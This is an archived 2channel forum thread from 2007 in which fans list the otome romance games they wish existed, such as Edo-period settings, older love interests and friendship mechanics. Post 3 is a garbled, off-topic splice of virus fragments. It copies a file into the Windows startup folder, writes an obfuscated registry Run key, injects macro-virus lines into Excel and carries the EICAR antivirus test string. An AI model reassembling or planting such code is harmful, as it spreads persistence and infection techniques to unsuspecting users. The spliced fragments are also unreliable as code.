2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

あなたが考える理想の乙女ゲー Part4

1 :名無しって呼んでいいか?:2007/07/12(木) 21:46:04 ID:???
こんな乙女ゲーがしたい!という希望・意見なら何でもドーゾ
便乗、賛同もOKですが人の意見に難癖つけないように
ただしエロ、グロネタなどは禁止

前スレ
http://game12.2ch.net/test/read.cgi/ggirl/1145187709/

関連スレ
女主人公版をプレイしたいゲームは?
http://game9.2ch.net/test/read.cgi/ggirl/1066458372/l50
乙女ゲーム化して欲しい作品 その4
http://game12.2ch.net/test/read.cgi/ggirl/1177883177/
こんな女向けゲーはイヤだ!
http://game9.2ch.net/test/read.cgi/ggirl/1136678863/l50
乙女ゲーの主人公の容姿について語るスレ
http://game9.2ch.net/test/read.cgi/ggirl/1137909678/l50
板住人で架空の女性向けゲームを考えるスレ
http://game9.2ch.net/test/read.cgi/ggirl/1070587188/l50
藻前が一つのゲームを立派に作り上げるスレ・5作目
http://game12.2ch.net/test/read.cgi/ggirl/1182652783/

2 :名無しって呼んでいいか?:2007/07/12(木) 23:22:18 ID:gRXnM/Q1
受け身なのとか
服装とか攻略対象の好みに合わせるんじゃなくて
攻略対象にコーディネイトして貰うとか


3 :名無しって呼んでいいか?:2007/07/13(金) 00:15:48 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


4 :名無しって呼んでいいか?:2007/07/13(金) 21:15:42 ID:???
厨設定が満載なゲーム。
酷い程ハマッてしまう。

5 :名無しって呼んでいいか?:2007/07/14(土) 18:17:03 ID:???
魔女の宅急便に出てくるパン屋の主人みたいなキャラを攻略してみたい
イケメンばかりもいいけど、ボクトツでも実は心優しい頼りがいのある男が
たまにはいても癒されていいと思う

6 :名無しって呼んでいいか?:2007/07/14(土) 22:51:21 ID:???
じゃあ私は大河の風林火山みたいなのを推しておこう
池面なんてほとんどいない無骨な世界なのにみんなかっこいい
特に重臣の爺さん二人

7 :名無しって呼んでいいか?:2007/07/15(日) 05:30:42 ID:???
自分でメイキングしたヒロインでプレイできたり、攻略キャラとしてでてきたら良い


8 :名無しって呼んでいいか?:2007/07/15(日) 10:32:41 ID:???
立体的な絵本の世界を表現したゲーム。
一つの話を長く遊ぶよりも
短編をポツポツ遊びたい。
ウォーターハウスのアリアドネの様な場所ほしいぃ!

9 :名無しって呼んでいいか?:2007/07/16(月) 00:31:52 ID:???
ルナティック雑技団の乙女ゲー
夢美ルートと森夜ルートで堪能したい

10 :名無しって呼んでいいか?:2007/07/17(火) 02:09:02 ID:???
ローグ!
ローグライクちっくな乙女ゲーがやりたい!

崩壊した世界で
ちまちまダンジョンもぐってアイテム集めて、
世界を再生していきつつ一緒にダンジョンもぐったり、
もって帰ったアイテム鑑定したり修理したり合成したりしてもらったり

そういうのがやりてー!!!

11 :名無しって呼んでいいか?:2007/07/18(水) 20:11:36 ID:???
難易度が易しい・難しい以前に
SLGやRPG要素が面倒に感じてしまうので
テキストアドベンチャーゲーム希望。

12 :名無しって呼んでいいか?:2007/07/19(木) 00:31:22 ID:???
戦国時代を舞台にした国とりRPGがやりたい
主人公は小国の姫かなんかで、民と領土をを守るため
周囲の他国と同じで天下統一に乗り出す
攻略キャラは無骨な将軍や渋くてダンディな老将軍、生真面目な臣下
食えない軍師とか
策で同盟を結ぶもよし、嫁ぐと見せかけて裏切るもプレイヤー次第




13 :名無しって呼んでいいか?:2007/07/20(金) 05:07:29 ID:???
ヴィクトリア朝
渋めのグラフィック
工房や階級物
ギャグ要素は無し

それかアマゾネスや海賊物。

14 :名無しって呼んでいいか?:2007/07/23(月) 22:54:36 ID:dQix8yJd
とにかく渋いおっさんばっかり攻略できる乙女ゲーがものすごくしたい。
自分声フェチなもんで、低い声・エロイ声・渋い声の声優さんに囁かれたい(*´Д`)ハァハァハァハァハァハァハァハァウハァ

15 :名無しって呼んでいいか?:2007/07/23(月) 23:01:36 ID:???
攻略キャラ全員がメガネの乙女ゲーはまだかね?

16 :名無しって呼んでいいか?:2007/07/24(火) 20:00:56 ID:???
>>15
フリーならある

17 :名無しって呼んでいいか?:2007/07/24(火) 20:58:51 ID:???
イタリアのギャングもので
再生漫画は関係なく。
同僚以外にもボス、敵対組織、警官、囚人、神父、目撃者
なんて濃い人たちを落としたい
神父は懺悔ルートで

18 :名無しって呼んでいいか?:2007/07/24(火) 22:36:05 ID:???
>>16
やっぱあるよなぁ〜。
需要高そうだもん。
フリーって同人PCソフトのことだよな。
ぐぐれば見つかるか…?

19 :名無しって呼んでいいか?:2007/07/24(火) 23:57:09 ID:???
声が若本規夫のキャラが攻略対象にいれば、他は何でもいい

20 :名無しって呼んでいいか?:2007/07/25(水) 13:49:52 ID:???
>>18
そうフリーPCゲー
たしかこの板で作られたゲームだった
題はThis love mega ne!(要日訳)

21 :名無しって呼んでいいか?:2007/07/26(木) 13:10:27 ID:???
実写で声優出演の乙女ゲーでないかな
夢小説と発想は同じ
声優萌えで買うからこういうほうが手っ取り早い
実写でなくても似顔絵でも可

ただ若手やイケメソ声優揃えるのはやめてください
おじさん希望


22 :名無しって呼んでいいか?:2007/07/26(木) 17:01:36 ID:???
さあ、これをやるんだ

【Darling】
人気声優・子安武人さんが迫真の演技でアナタにおくる、
実写版恋愛アドベンチャーゲーム!
ttp://www.nestegg.co.jp/contents/lineup/darling/index.html

23 :名無しって呼んでいいか?:2007/07/27(金) 12:34:13 ID:???
うはw
こういうのが欲しいw

実写恋愛アドベンチャーがもっとメジャーなジャンルになってくれ!

24 :名無しって呼んでいいか?:2007/07/27(金) 23:46:48 ID:???
中学生日記みたいな青春ゲーがしたい
(年齢詐称だろう、君達みたいなキャラは少なめ)
告白してくる異性キャラは余裕がなくて、切羽詰ってるくらいで
「好きだ…○○…お前がすげぇ好き」
告白した後にラヴレターを一方的に渡されて廊下に残されるくらいの
若い青春がしたいんじゃよ

25 :名無しさん@そうだ選挙に行こう:2007/07/29(日) 15:40:37 ID:???
これは…と思うのでも、ルート突入でイベントが失敗しない
選択肢に間違いが無いゲーム。
登場キャラクターが主人公に合わせるゲーム。

26 :名無しって呼んでいいか?:2007/07/29(日) 21:52:29 ID:???
主人公の基本の性格や好みをきめた上で、
何回かデートで彼の好きそうな選択肢やイベントをこなすと
服装とかセリフがどんどん主人公の好みに変わっていくとか面白いかも。

文系主人公×スポーツ系で恋愛映画の場合
「俺はもうちょっと派手なヤツのほうが・・・あ、いや、面白かった!サイコー」

ときメモでいう爆弾が爆発した後に
「俺ずっと我慢してたんだよ!こんな服もほんとは嫌いなんだ!!」

27 :名無しって呼んでいいか?:2007/07/30(月) 01:09:01 ID:???
>24
それすっごいやりたい。
やっぱ乙女ゲーの醍醐味はこっぱずかしいとこだと思うんだ。
友情とか、仲間でギャーギャーするのもいいなあ。

28 :名無しって呼んでいいか?:2007/07/30(月) 02:34:19 ID:???
THE鑑識官みたいに
青年1、妙齢の女性1、後はオヤジばっかり(もちろん攻略対象)
な職場が舞台で仕事の話メインの恋愛要素ありゲーがしたい…
恋愛メインんじゃなくて全然構わないんで(むしろそのせいで仕事がおろそかになってたら萎える)

29 :名無しって呼んでいいか?:2007/08/02(木) 20:17:38 ID:???
KIDの元社員だった阿保さんがBGM担当している乙女ゲーがしたいけど無理なのかな
この人の曲かなり好み。

30 :名無しって呼んでいいか?:2007/08/03(金) 12:14:02 ID:???
好感度って、攻略対象→主人公を指すけど、
それとは別に、主人公→攻略対象への興味度も欲しい。

狙ってないのに勝手に好感度上がった場合なんかは
主人公との温度差を感じるし、
場合によっては気が多い女に思えてしまう。

好感度が一定以上で発生するイベントでも、興味度が著しく低い場合は
辛らつだったり冷たい反応の選択肢が出現したりとか。
面倒くさくてメリットないだろうけど、1度ぐらいはそういうのやってみたい

31 :名無しって呼んでいいか?:2007/08/04(土) 09:50:21 ID:???
掛け合いができるやつ。
イベント上の流れではあっても
プレイヤーが介入する(選択肢)場面になった途端に
反応が無いどころか、しかめっ面されて終了〜は惜しい…!

変な選択肢がある。なおかつちゃんと反応が返ってくる。
不評みたいだけどやっぱりほしい。

面倒そうな上、何でこっちがという気がしないでもないけど
誤った解釈をされた時、選択肢のフォローが可能。

32 :名無しって呼んでいいか?:2007/08/04(土) 14:53:28 ID:???
良い意味での日本のうやむやさが感じられて
平安・室町時代のどちらかを舞台に
生活や和歌等の教養文化の描写がバンバン入っていて、そして選べる。
あるのは“文章だけ”グラフィック、音楽が全く無い
想像力が滅茶苦茶に掻き立てられる物語体験型アドベンチャーゲーム。

文章だけで萌えさせて〜。

33 :名無しって呼んでいいか?:2007/08/04(土) 15:36:18 ID:???
時代モノで許婚、商人(城にたまにくる)、側室?みたいなの他
忍ぶ恋を希望(^ω^)

34 :名無しって呼んでいいか?:2007/08/06(月) 01:04:30 ID:???
主人公の片思いが発端でなかなか攻略対象には火が付かない。
好かれるための努力を友達の協力を得ながら頑張り、ストーカーぎりぎり行為までやり詰めるw
攻略対象は主人公にはあくまでさりげなく友人として接し
たまに無意識の嬉しい萌えポインツを垣間見せてくれる。
間違っても口説いてきたりあからさまな好意は寄せない。
見てるだけでもいいくらいの片思いを長く楽しみたい…

35 :名無しって呼んでいいか?:2007/08/06(月) 23:43:09 ID:???
主人公が余り若くない。
綺麗なだけじゃなく汚さもある。
霊体や峰打ち無し、情け容赦無用のアクション。
変なミニゲームがない。
BGMや音声がキンキンうるさくない。
「信頼」程度に止まれる。
都合良く女の子になったりしない。
(プレイヤーに託されるのが一番良いと思う)
プレイヤーの選んだ行動が、主人公によって却下されてえ゛ぇーとならない。

嫌ゲーじゃないよw
糖度が低くても楽しめるから、希望してみる。

36 :名無しって呼んでいいか?:2007/08/09(木) 18:46:56 ID:???
中東系マダー?

37 :名無しって呼んでいいか?:2007/08/09(木) 20:47:24 ID:???
少女漫画のベタなお約束がこれでもかというほどつまっているやつがやってみたい。
幼馴染は窓から入ってきて、曲がり角では転校生とぶつかり、
不良は雨の中子猫をひろう。

38 :名無しって呼んでいいか?:2007/08/09(木) 20:53:14 ID:???
>>35
それイイ
何だかよく分からないうちに発展してる恋愛感情よりも、
しっかりがっちり結ばれた信頼の方が萌えるし燃える。

39 :名無しって呼んでいいか?:2007/08/10(金) 17:10:41 ID:???
友情をはぐくめるのほしー!!

なんでも恋愛とかじゃなくてさ!
やっぱ信頼関係あってこその人間関係じゃん!

て思うわけで

40 :名無しって呼んでいいか?:2007/08/13(月) 21:13:22 ID:???
感情入力もいいけど、キャプテン・ラヴのような選択肢システムが欲しい。
細かいニュアンスを伝えられたから、
選んだ選択肢の言葉と、主人公の言い方がまるで違っていて
そういうつもりで選択したわけじゃないのに…ってこともなかったし
反応が変わらないなんて手抜きしてないところもよかった。
やっぱり反応が変わらないとね。

41 :名無しって呼んでいいか?:2007/08/13(月) 21:19:18 ID:???
乙女ゲって、まともな選択肢ばかりで物足りない
GSシリーズですら随分大人しめだったし
これはないww
と思いながら選ばせて欲しい

42 :名無しって呼んでいいか?:2007/08/14(火) 21:12:20 ID:???
ワーネバみたいに生活の一部って感じのでないかな。
若いときから年寄りまでって。
でも、寿命システムが悲しすぎてできないかも。

43 :名無しって呼んでいいか?:2007/08/16(木) 23:24:50 ID:???
家族がテーマのしてみたい
母親が再婚したものの突然他界
未成年でまだ学生の主人公は、ロクに面識のない父親とその子供と一緒に暮らすことになる。
主人公は明るく新しい家族たちと進んで仲良くやろうってタイプだと
家族たちのトラウマを癒して云々パターンに陥りそうだから
主人公自身が冷め切っているタイプとかで。


44 :名無しって呼んでいいか?:2007/08/18(土) 17:06:02 ID:???
義理のお兄ちゃんは一人はトラウマ持ちで
一人は明るい人気者タイプ
ひとつ年下の弟は内気な秀才タイプとかどうだ

45 :名無しって呼んでいいか?:2007/08/24(金) 20:55:43 ID:???
耽美派

46 :名無しって呼んでいいか?:2007/08/25(土) 16:48:57 ID:???
攻略対象が全員ヤンデレな乙女ゲーやってみたいな
ありそうでないし

47 :名無しって呼んでいいか?:2007/08/26(日) 20:10:43 ID:???
主人公がとにかく高飛車でエラそうな女王様タイプのゲームしてみたい
 
もしくは、選択肢が
・よきにはからえ
・妾はもう飽きたのじゃ
・切腹じゃ
・爺を呼べ!
みたいなあんみつ姫的な主人公のやつ


48 :名無しって呼んでいいか?:2007/08/26(日) 22:46:23 ID:???
あんみつ姫wwwテラナツカシスwww

49 :名無しって呼んでいいか?:2007/08/26(日) 23:08:12 ID:???
クックックックックエスチョーン♪

懐かしいなあ
好きな時間にチェンジできて
姫でないと起きないイベントとか
町娘でないと起きないイベントがあって欲しい

50 :名無しって呼んでいいか?:2007/08/28(火) 23:46:56 ID:???
基本的な内容はHop Step あいどる☆そのままで
イベント量や内容がプロジェクトV6並にある、
アイドル育成ゲーム出たら、ものすごくやりこむ。

51 :名無しって呼んでいいか?:2007/08/30(木) 01:55:12 ID:???
執事ゲー
18禁にあるけどさ、もっと改良して一般でやりたい。

52 :名無しって呼んでいいか?:2007/08/30(木) 20:09:49 ID:???
>>41
ネオ案はけっこうびっくりした。違う意味だけど
人が部屋に来ても無視するとか
苦しんでる人を放って帰るとか


私は女性声優が少年役やるゲームがほしい

53 :名無しって呼んでいいか?:2007/08/31(金) 17:03:04 ID:???
主人公は会員制高級料亭「美味倶楽部」の一人娘
 
しかし、親戚は虎視眈々と跡目を狙っており、「至高のお品書き」と「究極のお品書き」の二派に別れ、跡目争いをすることに…
 
・主人公:海原ゆうな
天才的な舌と料理のセンスを持つ少女
傲慢で尊大なところがある
だが、有り余るカリスマにより凡人にとっては欠点でも彼女の場合は長所となる
口癖は
「女将を呼びなさい!」
 
・究極のお品書き代表:谷岡
主人公の親戚
主人公に匹敵する才能を持つが、普段はぐうたらなダメ男
新聞社に勤め、後輩の栗畑と共に「究極のお品書き」で主人公に対抗してくる
本来は跡目に興味が無い中立派の彼だったのだが………
 
・究極のお品書き協力者:栗畑
谷岡の後輩
真面目でおっとりとした好青年だが、その舌とセンスは確かなもの
主人公の、傲慢で尊大な態度の裏に隠した孤独を感じ取り、主人公へと惹かれる
 
 
 
やりたいなぁ…

54 :名無しって呼んでいいか?:2007/09/01(土) 17:45:41 ID:???
攻略対象が全員彼女持ち
略奪愛とかじゃなくて、お互いが「彼女がいるんだから・・・」と
ダメだダメだと気持ちを押さえ込んで悶々するゲームがやりたい
男性視点もありだといい!
まぁ、シナリオがそうとう良くなきゃ違う意味で悶々しそうだけど

あ、でもハッピーエンドは略奪愛になっちゃうかw

55 :名無しって呼んでいいか?:2007/09/02(日) 06:44:19 ID:???
>>54を読んで

攻略対象の彼女が他の男に目移りするよう、影で色々工作し、
攻略対象が振られるように仕向けるゲーム

を思いついた。
一応略奪愛ではないかもしれんw

56 :名無しって呼んでいいか?:2007/09/04(火) 13:23:14 ID:???
主人公はプロゴルファー
異世界に召喚され戸惑いながらも自慢のアイアンを片手に世界を救う
球飛ばしで遠距離、つっつきで中距離、殴りで近距離
両手に持てば二刀流も可能

57 :名無しって呼んでいいか?:2007/09/11(火) 18:22:24 ID:???
新婚さんゲーがやりたい。というか旦那様呼び萌え。

危篤の父に見せてあげたいとかベタな理由でいいから、ゲーム途中で結婚していちゃいちゃしたい。
一緒にお風呂とか学校か職場か秘密にしててばれそうになったりとか婚姻届だしにいったりとか

現実にある同居するうえでの苦労とかはスルーで。

58 :名無しって呼んでいいか?:2007/09/11(火) 23:10:58 ID:???
>>57に乗っかってすまんが、相手によっては
「なにこいつ、よりによってなんでこんな奴と…!」みたいな
親に無理やり決められました許婚しかもやな奴(主人公から見ると)が
いるといいな。

というか許婚ゲーやりたくなってきた。
両親が適当な性格で、気がつくと許婚がてんこ盛りに。
多種多様な職業と年齢層の中から自分だけの最高物件をチョイス!

59 :名無しって呼んでいいか?:2007/09/18(火) 09:56:21 ID:???
>>58に乗っかってw

お約束だが
貧乏・普通な財力の男を選ぶと財産もちの男が
圧力かけてきたら面白いとかオモタww

60 :名無しって呼んでいいか?:2007/09/23(日) 17:33:40 ID:???
ガンパレとか魔人みたいな雰囲気のがやりたい
日常(学校生活)→非日常(いつ来るか分からない戦闘)の繰り返しで
PCが大怪我したら仲いいキャラから声かけられたり助けられたりして
仲間も多めに(10人以上)いて
同性異性に関わらず友情育めたりするといい
自分だけじゃなく他のキャラ同士が仲良くなる手伝いもできるといい
恋人や親友になったキャラとは協力奥義が使えるとか

61 :名無しって呼んでいいか?:2007/09/23(日) 19:37:51 ID:???
ちょっとあげますよ

>>57-59
新婚・許婚ゲーいいな 主人公はぜひ18歳前後の幼妻で

結婚してから恋愛してハッピーエンドって逆行してるかんじでいいな
嫌いだった相手と無理矢理結婚させられて徐々に本当の夫婦に〜ってのもいい
ハネムーンとか結婚記念日イベントとかな
ゲームが新婚初夜から始まるとかなwもちろんなにもないけど

62 :名無しって呼んでいいか?:2007/09/24(月) 03:15:29 ID:???
>>9
ルナティック雑技団wちょっとやってみたいww


攻略対象は幼馴染・先輩・後輩・眼鏡等、様々な度合いのヘタレ野郎ばかりで
戦隊モノという乙女ゲーをやってみたい。

主人公や攻略対象はプレイヤーが好きなカラーにチョイス出来る。
特に主人公は色ごとにイベントやキャラのリアクションが違う。

赤…仲間達との絆等といった熱血王道
黒…初めは敵幹部で実は赤と兄弟(この場合赤と恋人EDは無し)
黄色…カレー・ハヤシ戦争勃発 など

63 :名無しって呼んでいいか?:2007/09/24(月) 06:26:14 ID:???
攻略対象が多すぎるやつ。

ツンデレ、天然、クール、甘えた、
爽やか、鬼畜、ナンパ
×
先輩、後輩、同級生、先生…

総勢28名…+【メガネ】だけ11パターン(7+4種類)とか。

自分で書いてるだけでも混乱…コンプ不可能だ



64 :名無しって呼んでいいか?:2007/09/24(月) 07:01:07 ID:???
スマン…メガネだけでも28人だ。
総勢28+28=56人って事か…。
ほんとに多すぎた。ごめん。

65 :名無しって呼んでいいか?:2007/09/24(月) 07:30:40 ID:???
望みは大きく果てしなく
考えるだけならタダさ

66 :名無しって呼んでいいか?:2007/09/24(月) 09:07:05 ID:???
ある日突然、あなたに12人もの子安ができたらどうしますか?

それも……とびっきりかわいくて
とびっきり素直で
とびっきり愛らしくて
とびっきりの淋しがりや。
しかも、そのうえ……
子安はみんなみんな、とびっきり!
自分のコトが大好きなんです……

でも、残念なことにあなたと子安は
現在離れ離れに暮らしていて……
実際に会うことができるのは、
6ヵ月後と決められた“発売の日”だけ。
大好きなあなたと自由に会えない子安は……
さみしくて、いつもあなたのことばかり想ってしまいます。
「神様……どうか、早く子猫ちゃんに会えますように
俺の大事な大事な子猫ちゃん……会えないでいると……
淋しい気持ちでいっぱいになっちゃうよ……」

だから、ようやく6ヶ月後の
「発売日」がめぐってきて……
2人が会えたときには、
子安は世界中の幸せを独り占めしたみたいに、
とってもとっても……幸せ
もちろん二次元なんだけど、気分はまるで楽しいデート!
そして子安は、画面のそばにぴったりくっついて……
心配そうにプレイヤーの顔をのぞき込み、
こう……言うのです。
「子猫ちゃん……子安のコト、好き?」

子安はちっちゃい頃からずっとずっと
ただ純粋にあなたのコトが大好きでした。
やさしくってステキで世界にただ1人、
自分だけの大切な冷凍ミカン様……。
だから、いつもいつもあなたと一緒にいたくて、
いつもいつもあなたにかまってほしくて……。
ここに登場するのはそんな素直な子安達……。
外見も性格もちがう12人の子安達ですが、
想いだけはみんな同じ……そう
「……自分、大好き!」

67 :名無しって呼んでいいか?:2007/09/24(月) 12:13:28 ID:???
イヤだスレにいってくれ

68 :名無しって呼んでいいか?:2007/09/24(月) 13:30:37 ID:???
>>66
日暮の富田家ではあった。

69 :名無しって呼んでいいか?:2007/09/24(月) 17:22:50 ID:???
なんとなく思い付いた。
主人公が攻略対象キャラと初めて接触した時に、第一印象を選択することで
主人公→キャラに対するアプローチが変化してシナリオも変わってくるようなの。
例えば、廊下でぶつかった相手に対しての第一印象を選択。
・なによ!いきなり危ないわね!→主人公ツン化、ケンカしつつも互いに意識し合うルートへ。
・わ、すごくカッコ良い人☆→一目惚れで主人公デレ化(古いけどかぼちゃワインみたいな…)迷惑がられつつ押しかけ女房化ルートへ

プレイヤー側の好みをある程度反映できるし、周回プレイ時に印象を変えることで
相手キャラの別な一面を見ることもできてシナリオ金太郎飴は避けられる。
アンジェで性格分岐があったけど、それよりパーツが細かい感じで。

70 :名無しって呼んでいいか?:2007/09/25(火) 01:41:06 ID:???
主人公がDQNじゃない乙女ゲー

71 :名無しって呼んでいいか?:2007/09/25(火) 21:24:13 ID:???
舞台が関西で基本的に攻略対象が全員関西人の乙女ゲー
隠しキャラで東京からの転校生も入れたい
どのシナリオも基本的にお笑い風味。
主人公のキレのいいつっこみで好感度うp
「お前がいると俺、安心してボケられるんや」

72 :名無しって呼んでいいか?:2007/09/26(水) 13:53:33 ID:???
主人公が頑張らなくていい乙女ゲー

73 :名無しって呼んでいいか?:2007/09/27(木) 12:58:27 ID:???
主人公はアヒルの国の王女
べただけど、人間になるために魔法使いと取引して人間になれるように
ちなみに攻略キャラの褒め言葉は
「素晴らしい羽毛」「可愛いお尻」

74 :名無しって呼んでいいか?:2007/09/27(木) 23:03:32 ID:???

こんなラ/ブ/レ/ボがやってみたくなった。


76 :彼氏いない歴774年 :2007/06/18(月) 20:36:30 ID:cxj+hiJX
菓子「しのび逢いは蜜の味、ってね…。夜更けだ、誰も見てやしねぇ…いいだろ?」

体重計「こんな激しい動き…ああ…すごいよ…」

ダイエット「また菓子の奴に浮気しだだろう…いつもそれじゃないか。
       お前、本当に俺のことを真剣に考えてるのか?」

244 :彼氏いない歴774年 :2007/06/19(火) 23:38:00 ID:Y3m008eG
ダイエット「……また俺を裏切るのか?」

248 :彼氏いない歴774年 :2007/06/19(火) 23:46:57 ID:lzMxFjEN
ダイエット食品「わかってる、俺たちは合わなかったんだ・・・」

512 :彼氏いない歴774年 :2007/06/24(日) 00:34:01 ID:G9lg+GS3
脂肪「お前を一生離さないと、神に誓っても良いよ。」
ダイエット「いい加減、彼女を離してやれよ。彼女は俺のものだ。」
体重計「何言ってるんだ、お前ら。彼女の喜びも悲しみを知ってるのは俺だ。」
リエータ「いいや、彼女の力になれるのは、俺しかいない。」


ぬこ「彼女を一番癒せるのは、この俺にゃ〜。」

75 :名無しって呼んでいいか?:2007/09/27(木) 23:23:30 ID:???
友情を育める

76 :名無しって呼んでいいか?:2007/09/28(金) 15:28:35 ID:???
どなたか過去ログもってないですか?

77 :名無しって呼んでいいか?:2007/09/28(金) 21:37:39 ID:???
歴史(時代)ものの乙女ゲーなんてどうだろう
ベースは敢えて江戸時代中期の平和な頃チョイスで

主人公
1 そこそこ良いお家柄(公家系)の姫、他より若干プライドが高い
2 平凡で庶民的、気さくで明るい町娘
3 旗本(A)の武家の姫、少々気弱
みたいに、主人公選択可能だといい。
で、選んだ主人公によって展開(台詞等)が変わるとか
選ばなかった主人公もサブとして出るとか

攻略対象
・将軍(モデルはあるが上手くぼかす)。一応のメイン。
 大奥、御台様など、大抵女に囲まれているw
 しょっちゅう城を抜け出してお忍びで城下に出たりもする。
・恐らく40代以上と見られる殿(一藩主)。男やもめ。
・↑の殿の三男。若様。既に亡き妻との間に出来た子。
 嫡男と次男が相次いで死去する等して跡目相続の件で一悶着。
 揉めに揉めてちょっと疲れきってる若様。
 ※この親子はどちらかの√に入るともう片方は攻略不可に。
・↑の疲れきった若様を影でそっと支える乳兄弟。
 優しくて、若様とも親しくしてるといつのまにか攻略不可に。
・将軍家のお庭番。出自はめっちゃ庶民。因みに無精髭。
 1や3の姫主人公だと身分差により尻込みしてしまう(彼が
・将軍家の家臣。お忍び癖のある殿にため息をつきながらも忠義を誓う苦労人。
・大店の元若旦那。商人と言うより荒くれ者に近い。
 飲む打つ買うなど道楽が過ぎて家を追い出されるろくでなしw
 その後は酒場で気楽に過ごしている。少々ナンパ系。
・大店の若旦那。ヘタレに見えるが人望は厚い。
 飲む打つ買うなどもってのほかしまいにゃ恋わずらいで寝付く純情若旦那。
 ↑の元若旦那の弟で、彼が追い出されたので若旦那におさまる。
・そこそこ名の知れた医師。笑顔が素敵で、悩みも優しく聞いてくれる。
 ただしあまり若くない。取り敢えず三十路は軽く超えている。
・将軍家に仕える奉行。桜吹雪を惜しげもなく晒している。兄貴。
・将軍の影武者。無口にして無愛想。ただ将軍を護る為に生きてきている。
 常に死と隣りあわせな、愛を知らない孤独な影武者。
・将軍に気に入られている異国人。金髪碧眼。
・流浪に旅するそこそこ高名な剣豪。
 剣以外に興味がない渋い兄さん(寧ろおじさん)。髭もしっかり。

78 :77続き:2007/09/28(金) 21:38:34 ID:???
・主人公3の父に仕える警護の隠密。主の命で主人公3を護る。
 口にこそ出さないが主人公3を大切に思っている。(恋愛でなしに) 
 何気に主人公3だと攻略がスムーズ。
・歌舞伎役者。ナンパ系通り越して歩く15禁ってくらい言動がエロイ。
 いつも豪快に爽やかに笑ってる自由人。教養も最低限はある。
 主人公2とは仲良し。兄妹みたいと言われるほどw
・貧乏旗本(B)の三男。家督は継げない。そしてツンデレ。
 だからせめて家のためにはなろうと町で仕事(下働きに近い)に励んでいる。
 でも普段はそんな素振りは見せずあくまで家ではなく自分のためと言い張る。
・ゲームが少し進行すると現れる主人公1の許婚的存在。(形式だけ
 お互いに「親の決めた相手と結婚や見合いなんてやだ」とか言って
 家出した時に偶然出逢ってちょっと惹かれあう。でも親に見つかって引き裂かれる。
 その後、見合いの席で再会。許婚と入ってもあくまで見合いのみ。
・親の借金がたたって女郎屋で用心棒をしている旗本(C)の息子。
 普段はぼけっとしてるがやるときはやる決めるときは決める。
・巷で有名な絵師。幼少から病弱。しかし金遣いが荒い。ちょっと黒い。
 その有名さと時には美顔(自覚してる)を武器に金稼ぎをしたりも。
・お稚児あがりの美青年。将軍√からの派生で攻略できる。
 非常にかわいらしく純情……と見せかけて実は黒い。
 そして そこはかとなく エロイ。ただし言葉攻めタイプ。
・江戸の平和を護る為剣を振るう侍。真面目系。
 本当に「武士!」って人。どこか老成している。
 20代前半ほどなのにおっさんくさいところがあるといい。 
・京からはるばるやってきた美僧。丁寧な口調で物腰も柔らか。
 √では、出家した我が身と主人公への思いに苦悩する。

などなど。長くてごめん。

79 :名無しって呼んでいいか?:2007/09/30(日) 18:07:52 ID:???
「ソムリエ」とか「王様のレストラン」とか「バンビーノ」みたいな、そういうので乙女ゲー。
学園モノ、制服モノはおなかいっぱい。

80 :名無しって呼んでいいか?:2007/09/30(日) 22:19:18 ID:???
シスプリの弟版きぼん

81 :名無しって呼んでいいか?:2007/10/03(水) 02:16:40 ID:???
かなり本格的なRPGの乙女ゲー希望


82 :名無しって呼んでいいか?:2007/10/03(水) 22:29:55 ID:???
主人公が訛ってるゲーム。
訛りがひどすぎて話が伝わらない&標準語だと何を言われてるかわからない
みたいなプチ海外体験。

83 :名無しって呼んでいいか?:2007/10/04(木) 20:02:57 ID:???
題材は何でもいいから
その題材を突き詰めてるもの。
設定と舞台をかえても成立するような薄さじゃないもの

84 :名無しって呼んでいいか?:2007/10/06(土) 14:24:39 ID:???
とりあえずもう
元気でフツーの頑張り屋さんな女の子☆
は秋田な。
つか攻略キャラに笑顔が素敵とか面白いなお前とか( ゚д゚)な理由で良い印象もってもらえてるのにいい加減違和感…。

ギャルゲ主人公並のやられ、上にあるみたいな超高飛車姫、慎ましやかなお嬢様、ツンっ子デレっ子etc

この辺キボン。
って事でage

85 :名無しって呼んでいいか?:2007/10/06(土) 16:17:22 ID:???
理想というか>>82を見てふと思いついただけだが、セリフが全部英語で字幕の乙女ゲー
ちょっとやってみたい

86 :名無しって呼んでいいか?:2007/10/06(土) 22:07:53 ID:???
自分が欲しいの書き捨て

・主人公は無個性(自分の考えと違う行動されるとモヤッとするんだ!)
・ガンパレみたいにキャラがAIで行動
・舞台はちょっと不気味な不思議の国(いつでも夜、とか妙な城がある)
・【ゲームとして】楽しく、愛着が持てるもの

87 :名無しって呼んでいいか?:2007/10/06(土) 22:16:59 ID:???
逆に主人公がバリバリに個性的で、ストーリーががっちり練りこまれているADVがやりたい
バトル要素ありの近未来ものとか出てくれないかな……

88 :名無しって呼んでいいか?:2007/10/07(日) 13:22:56 ID:???
ロリっ子妹系主人公希望。
甘えたな女の子もろ趣味なんだが…需要低そうだorz


89 :名無しって呼んでいいか?:2007/10/07(日) 17:20:04 ID:???
とりあえずスクールデイズの言葉並に
ヤンデレな奴がいるゲームきぼん。

90 :名無しって呼んでいいか?:2007/10/09(火) 00:59:45 ID:???
つ そんな貴女に杉田智和

91 :名無しって呼んでいいか?:2007/10/09(火) 22:05:33 ID:???
>>36と同じく中東系マダー?

92 :名無しって呼んでいいか?:2007/10/10(水) 06:56:19 ID:???
なんちゃってアラビアならございますが

31 KB
